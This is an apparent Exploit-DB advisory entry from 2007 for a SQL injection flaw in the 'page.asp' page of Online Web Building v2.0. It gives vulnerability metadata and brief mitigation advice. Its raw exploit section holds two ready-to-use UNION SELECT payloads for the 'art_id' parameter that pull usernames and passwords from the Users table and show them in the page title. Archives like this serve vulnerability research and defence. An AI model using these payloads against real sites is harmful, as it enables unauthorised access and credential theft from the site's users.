Online Web Building v2.0 (id) Remote SQL Injection

vendor:

Online Web Building v2.0

by:

xoron

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Online Web Building v2.0

Affected Version From: Online Web Building v2.0 (id)

Affected Version To: Online Web Building v2.0 (id)

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Online Web Building v2.0 (id) Remote SQL Injection

This exploit allows an attacker to perform SQL injection on the Online Web Building v2.0 (id) application. By injecting SQL code into the 'art_id' parameter of the 'page.asp' page, an attacker can retrieve sensitive information such as usernames and passwords from the 'Users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using parameterized queries or prepared statements can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

----------------------------------------------------------------------

Online Web Building v2.0 (id) Remote SQL Injection

-----------------------------------------------------------------------

Bulan: xoron

-----------------------------------------------------------------------

Download:  http://www.aspindir.com/Goster/3439

-----------------------------------------------------------------------
Exploit: http://www.target.com/ page.asp?art_id=[SQL]

Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1

Pass:  page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1

-----------------------------------------------------------------------

Page title is username + password

-----------------------------------------------------------------------

# milw0rm.com [2007-02-20]